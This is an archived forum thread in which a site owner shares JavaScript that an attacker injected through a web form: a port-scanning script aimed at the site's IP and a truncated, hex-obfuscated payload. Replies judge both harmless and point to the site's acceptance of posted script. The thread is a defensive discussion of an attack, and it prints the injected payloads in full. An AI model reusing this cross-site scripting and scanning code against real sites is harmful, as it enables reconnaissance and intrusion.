Jump to content

Attacker


djp1988

Recommended Posts

Hi everyone, I had some smart arse trying to get some info from my site by posting javascript in a form, thought you guys may be interested in having a look:

<script>function scanPort(callback,target, port, timeout){ var timeout = (timeout == null)?100:timeout; var img = new Image();  img.onerror = function () {  if (!img) return;  img = undefined;  callback(target, port, 'open'); };  img.onload = img.onerror; img.src = 'http://' + target + ':' + port;  setTimeout(function () {  if (!img) return;  img = undefined;  callback(target, port, 'closed'); }, timeout);};function record(ip,port,open){alert(ip+':'+port+' is '+open);}function scan(ip,portfrom,portto,timeout){for (i=portfrom;i=portto;i++){scanPort(record(),ip,i,timeout);}}scan('0.0.0.0',1,80,200);</script>

the 0.0.0.0 was the site's ipthe same person opened another account and inserted the following in a javascript tag:

\x50\x20\x64\x3D\x5B\x22\x5C\x6B\x5C\x65\x5C\x68\x5C\x66\x22\x2C\x22\x5C\x65\x5C\x6B\x5C\x63\x5C\x67\x22\x2C\x22\x5C\x78\x5C\x65\x5C\x67\x5C\x66\x5C\x63\x5C\x67\x5C\x66\x5C\x71\x5C\x66\x5C\x7A\x5C\x6B\x5C\x63\x22\x2C\x22\x5C\x69\x5C\x6B\x5C\x6B\x5C\x72\x5C\x73\x5C\x6F\x5C\x69\x5C\x66\x5C\x73\x5C\x65\x5C\x67\x5C\x79\x5C\x51\x5C\x71\x5C\x6D\x5C\x6D\x5C\x6D\x5C\x71\x5C\x44\x5C\x65\x5C\x6A\x5C\x74\x5C\x71\x5C\x75\x5C\x6A\x5C\x72\x5C\x63\x5C\x67\x5C\x6F\x5C\x65\x5C\x6C\x5C\x63\x5C\x6C\x5C\x52\x5C\x53\x5C\x6F\x5C\x6E\x5C\x69\x5C\x6A\x5C\x68\x5C\x63\x5C\x66\x5C\x76\x5C\x45\x5C\x46\x5C\x54\x5C\x71\x5C\x55\x22\x2C\x22\x5C\x68\x5C\x63\x5C\x66\x5C\x47\x5C\x63\x5C\x56\x5C\x75\x5C\x63\x5C\x68\x5C\x66\x5C\x57\x5C\x63\x5C\x69\x5C\x6C\x5C\x63\x5C\x6A\x22\x2C\x22\x5C\x78\x5C\x65\x5C\x67\x5C\x66\x5C\x63\x5C\x67\x5C\x66\x5C\x71\x5C\x72\x5C\x63\x5C\x67\x5C\x77\x5C\x66\x5C\x6E\x22\x2C\x22\x5C\x72\x5C\x6

Link to comment
Share on other sites

The "hacker" is just trying to scare you.The first script does nothing but go opening alert boxes that say "0.0.0.0:1 is open"By the way, he made a mistake here and executed a function rather than reference it:scanPort(record(),ip,i,timeoutThe second thing you're showing doesn't actually do anything at all, it's just a series of random characters that might slightly resemble some form of JSON.Are you allowing people to post Javascript on your page?

Link to comment
Share on other sites

It would appear so yes :)I've gone through this and disabled it now, I made these scripts a few years ago... since, I've been doing different projects and haven't really had time to go back and redo and improve older projects.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...